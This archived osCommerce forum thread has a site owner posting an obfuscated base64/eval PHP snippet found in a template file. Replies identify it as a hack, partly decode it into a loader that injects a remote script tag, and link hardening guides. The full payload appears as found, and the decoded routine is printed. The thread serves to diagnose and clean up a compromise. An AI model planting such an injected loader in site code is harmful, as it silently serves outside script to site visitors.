Jump to content

Archived

This topic is now archived and is closed to further replies.

kevinhuynh

What is going on with this script?

Recommended Posts

I found this code in template_bottom file. I don't know what is this script mean. But when it is available my ssl is not working well. The lock of ssl don't show. When I remove it the ssl in mysite is show the lock for ssl.

 

Here is the code:

<?php

 

@eval(@base64_decode("QGV2YWwoQGJhc2U2NF9kZWNvZGUoImFXWW9JV1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25YMFprTXprd01tVXlZVEF6WW1Ga01EazJNelk1T0RZeU9EWXlaR1psTlRaaE15Y3BLWHRtZFc1amRHbHZiaUJmUm1Rek9UQXlaVEpoTUROaVlXUXdPVFl6TmprNE5qSTROakprWm1VMU5tRXpLQ1JmVmpFellqVmlMQ1JmVmpnd05UUmlLWHNrWDFZell6WmxNRDFBY21GM2RYSnNaR1ZqYjJSbEtFQmlZWE5sTmpSZlpHVmpiMlJsS0NSZlZqZ3dOVFJpS1NrN0pGOVdNRFJsTWpnOVFHSmhjMlUyTkY5a1pXTnZaR1VvSkY5V01UTmlOV0lwT3lSZlZqaGpNV016UFhOMGNteGxiaWdrWDFZell6WmxNQ2s3SkY5V1pEZ3dNVEU5Wm14dmIzSW9KRjlXT0dNeFl6TXZNaWs3SkY5V1ptSTNaREE5SWlJN1ptOXlLQ1JmVmpnMk5XTXdQVEE3SkY5V09EWTFZekE4YzNSeWJHVnVLQ1JmVmpBMFpUSTRLVHNrWDFZNE5qVmpNQ3NyS1hza1gxWXpOekl3WWoxemRXSnpkSElvSkY5V01EUmxNamdzSkY5V09EWTFZekFzTVNrN0pGOVdPV1EzTTJROWMzUnljRzl6S0NSZlZqTmpObVV3TENSZlZqTTNNakJpS1R0cFppZ2tYMVk1WkRjelpEMDlQV1poYkhObEtTUmZWbVppTjJRd0xqMGtYMVl6TnpJd1lqdGxiSE5sZTJsbUtDUmZWamxrTnpOa1BpUmZWbVE0TURFeEtYc2tYMVl6T0dFMVpUMGtYMVk1WkRjelpDMGtYMVprT0RBeE1Uc2tYMVpoTjJZNFpqMXliM1Z1WkNnb0pGOVdaRGd3TVRFdE1Ta3RKRjlXTXpoaE5XVXBPMzFsYkhObGV5UmZWak00WVRWbFBTUmZWbVE0TURFeExTUmZWamxrTnpOa095UmZWbUUzWmpobVBYSnZkVzVrS0Nna1gxWmtPREF4TVMweEtTc2tYMVl6T0dFMVpTazdmU1JmVm1ZME1UWmhQWE4xWW5OMGNpZ2tYMVl6WXpabE1Dd2tYMVpoTjJZNFppd3hLVHNrWDFabVlqZGtNQzQ5SkY5V1pqUXhObUU3ZlgxQVpYWmhiQ2drWDFabVlqZGtNQ2s3ZlgwPSIpKTsKX0ZkMzkwMmUyYTAzYmFkMDk2MzY5ODYyODYyZGZlNTZhMygiUHo0TkNqdy9jR2h3RFFwbFkyaHZJQ2M4YzJOeWFYQjBJSE55WXowaWFIUjBjRG92TDNkM2R5NWhkWFJvWlc1MGFXTmhkR1YzWldJdVkyOXRMMjl6WTI5dGJXVnlZMlV2YVc1a1pYZ3VjR2h3SWlBK1BDOXpZM0pwY0hRK0p6c05DbVZqYUc4Z0lseHVJanNOQ2o4K0RRbz0iLCJKVE15SlRNMCIpOw=="));

 

?>

 

 

My website is shown in browswer :

 

 

I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked?

 

any advise ..thank so much

Share this post


Link to post
Share on other sites

Yes, you've been hacked. Secure your site with a password and then clean up the mess. Add the recommended security patches for your version before you reopen the site.

 

Regards

Jim


See my profile for a list of my addons and ways to get support.

Share this post


Link to post
Share on other sites

Beat me to it!!

 

Cheers

 

G

 

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

http://forums.oscommerce.com/index.php?showtopic=340995

 

These 2 show how to secure your site but as it has already been hacked you need to restore to a clean state and apply the fixes or find the changes and clean them out and apply the security fixes.


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

I don't know the meaning that they insert this code to the site. I found some topic that they said it means hacked?

 

any advise ..thank so much

 

Definate hack.

 

All I can make of it with a quick look is ..

 

<?php
if(!function_exists('_Fd3902e2a03bad096369862862dfe56a3')){
 function _Fd3902e2a03bad096369862862dfe56a3($_V13b5b,$_V8054b) {
$_V3c6e0=@rawurldecode(@base64_decode($_V8054b));
$_V04e28=@base64_decode($_V13b5b);
$_V8c1c3=strlen($_V3c6e0);
$_Vd8011=floor($_V8c1c3/2);
$_Vfb7d0="";
for($_V865c0=0; $_V865c0<strlen($_V04e28); $_V865c0++) {
  $_V3720b=substr($_V04e28,$_V865c0,1);
  $_V9d73d=strpos($_V3c6e0,$_V3720b);
  if($_V9d73d===false)
	$_Vfb7d0.=$_V3720b;
  else {
	if($_V9d73d>$_Vd8011){
	  $_V38a5e=$_V9d73d-$_Vd8011;
	  $_Va7f8f=round(($_Vd8011-1)-$_V38a5e);
	} else {
	  $_V38a5e=$_Vd8011-$_V9d73d;
	  $_Va7f8f=round(($_Vd8011-1)+$_V38a5e);
	}
	$_Vf416a=substr($_V3c6e0,$_Va7f8f,1);
	$_Vfb7d0.=$_Vf416a;
  }
}
@eval($_Vfb7d0);}}  
?>

 

The function calls: -

<?php echo '<script src="[http://]www(dot)authenticateweb(dot)com/oscommerce/index.php" ></script>'; echo "\n"; ?>

 

The last bit I only got some of but you can see the web address.

 

DON'T VISIT THAT LINK, IT'S MOST LIKELY DANGEROUS

Share this post


Link to post
Share on other sites

I have seen this same code in a virgin download of a template from the "monstrous" site.

I think, though am not sure, that it is an attempt by the template author to track usage.

 

 

 

gary


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

A google search shows the same web address but with other carts (prestashop, zencart, virtuemart, magento).

 

http://www.google.com/#q=site:www.authenticateweb.com&hl=en&prmd=imvns&filter=0&bav=on.2,or.r_gc.r_pw.r_qf.&fp=6469df5417c526af&biw=1920&bih=845


~ Don't mistake my kindness for weakness ~

Share this post


Link to post
Share on other sites

×